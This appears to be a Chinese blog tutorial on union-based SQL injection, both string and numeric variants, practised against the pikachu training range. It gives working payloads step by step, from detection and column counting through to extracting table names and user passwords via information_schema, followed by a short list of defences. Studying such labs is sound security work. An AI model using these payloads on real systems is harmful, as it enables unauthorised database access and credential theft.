union注入之字符型注入和数值型注入

一、什么是SQL注入?

SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。

二、union注入

当页面不屏蔽返回的报错信息且没有屏蔽“union”关键字的时候,我们就可以使用union注入。以下我们通过字符型和数值型两种类型对union注入进行理解。

<1>字符型注入

判断方法
当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。
(1)URL 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继续进行下一步。
(2)URL 地址中继续输入 http://xxx/abc.php?id= x’ and ‘1’='2 页面运行错误,则说明此 Sql 注入为字符型注入。
原因如下
(1)当我们输入id= and ‘1’='1时,数据库执行的查询语句为:

select* from <表名> where id= 'x' and '1'='1' 

语法正确,且逻辑没有问题,所以返回结果正确。
(2)当我们输入 x’ and ‘1’='2时,数据库执行的查询语句为:

select* from <表名> where id= 'x' and '1'='2'

语法正确,但逻辑有问题,所以返回结果错误。

实例

这里我们使用pikachu靶场进行测试,我们先输入kobe’ and ‘1’=‘1,输出正常,这里也可使用(ww’ or ‘1’=‘1)。
在这里插入图片描述
然后我们输入kobe’ and ‘1’='2,输出错误。
在这里插入图片描述说明存在SQL注入,接下来获取数据表的字段数,输入:

kobe' order by 3#

在这里插入图片描述
报错,尝试kobe’ order by 2#,返回正常,说明该表字段数为2。接下来我们需要获取数据库名。尝试在2的位置输入:

' union select 1,database()#

在这里插入图片描述
获取到数据库名为:pikachu,接下来我们需要获取表名。

' union select 1,table_name from information_schema.tables where table_schema= 'pikachu'#

在这里插入图片描述
再接下来就是获取字段名了。

' union select 1,column_name  from information_schema.columns where table_schema= 'pikachu'and table_name='users'#

在这里插入图片描述
最后就是获取字段内容了。

' union select id,password from pikachu.users#

在这里插入图片描述

数值型注入

判断方法
当输入的参数x为整型时,数据库执行的查询语句为:select * from <表名> where id = x,这时候可以使用and 1=1 和 and 1=2 来判断。
(1)url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
(2)url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此注入为数值型注入。
原因如下
(1)当输入 and 1=1时,数据库执行的SQL语句为:

select*  from <表名> where id = x and 1=1 

没有语法错误且逻辑判断为正确,所以返回正常。
(2)当输入 and 1=2时,数据库执行的SQL语句为:

select * from <表名> where id = x and 1=2

没有语法错误但是逻辑判断为假,所以返回错误。

实例

首先我们需要判断是否存在注入,在这里由于没有不能进行输入,所以我们需要通过修改包的方式进行判断。先随便选择一个id,点击提交进行抓包。
在这里插入图片描述
我们先尝试and1=1,发现返回与id=1相同的结果。
在这里插入图片描述
我们再尝试添加and1=2,发现返回错误。由此我们断定此处存在SQL注入。
在这里插入图片描述
接下来同样的,我们先获取字段数。

1 order by 2

在这里为了屏蔽“id”为正常值时的返回结果,我们可以将id值修改为其他不存在的数值(也只能是数值),以下都将其修改为“-1”。接下来获取数据库名。

-1 union select 1,database()

在这里插入图片描述
接下来是表名。

-1 union select 1,table_name from information_schema.tables where table_schema= 'pikachu'

在这里插入图片描述

再是字段名。

-1 union select 1,column_name  from information_schema.columns where table_schema= 'pikachu'and table_name='users'

在这里插入图片描述

最后是字段内容。

-1 union select id,password from pikachu.users

在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手工 SQL 注入漏洞通常是通过在应用程序的输入框中注入恶意 SQL 代码来实现的。当用户在应用程序的输入框中输入字符串时,如果应用程序没有对用户输入进行充分的验证和过滤,攻击者就可以在输入框中注入恶意的 SQL 代码,从而导致应用程序执行恶意的 SQL 查询。 在字符串类的 SQL 注入攻击中,攻击者通常会在输入框中输入一些特殊字符,例如单引号、双引号、反斜线等等,以试图破坏 SQL 查询语句的结构。攻击者还可能尝试使用 UNION、SELECT、FROM 等关键字来构造恶意查询语句,或者使用注释符号(例如"--")来注释掉原始查询语句中的一部分。最终,攻击者的目标是获取应用程序中存储的敏感数据,例如用户密码、信用卡信息等等。 要防止字符串类的 SQL 注入攻击,应用程序可以采取以下措施: 1. 对用户输入进行充分的验证和过滤,确保用户输入的数据符合预期的格式和结构。 2. 使用预编译语句或参数化查询,以保证 SQL 查询语句的结构不会被破坏。 3. 不要将用户输入作为 SQL 查询语句的一部分拼接到一起,而是使用参数化查询或存储过程来执行 SQL 查询。 4. 在应用程序中启用严格的访问控制和权限管理,以确保只有经过授权的用户才能访问敏感数据。 5. 定期对应用程序进行安全审计和漏洞扫描,及时发现和修复潜在的安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值